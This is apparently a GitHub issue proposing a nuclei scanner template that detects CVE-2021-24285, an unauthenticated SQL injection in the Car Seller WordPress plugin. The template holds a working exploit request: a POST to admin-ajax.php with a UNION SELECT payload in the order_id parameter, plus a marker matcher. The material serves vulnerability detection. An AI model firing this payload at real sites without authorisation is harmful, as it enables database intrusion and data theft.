### ISSUE TITLE
nuclei template for CVE-2021-24285

### ISSUE THREAD

**Issue by shreyapohekar** [projectdiscovery/nuclei-templates#1643]
**The template checks for Unauthenticated SQL injection in a vulnerable version (<=2.1.0) of Carsellers WordPress plugin**

```yaml
id: CVE-2021-24285

info:
  name: Car Seller - Auto Classifieds Script WordPress plugin SQLI
  author: ShreyaPohekar
  severity: critical
  description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.
  tags: cve,cve2021,wordpress,wp-plugin,sqli
  reference: |
      - https://nvd.nist.gov/vuln/detail/CVE-2021-24285
      - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
      - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162

requests:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: abcd
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Content-Length: 47

        action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"
        part: body
```
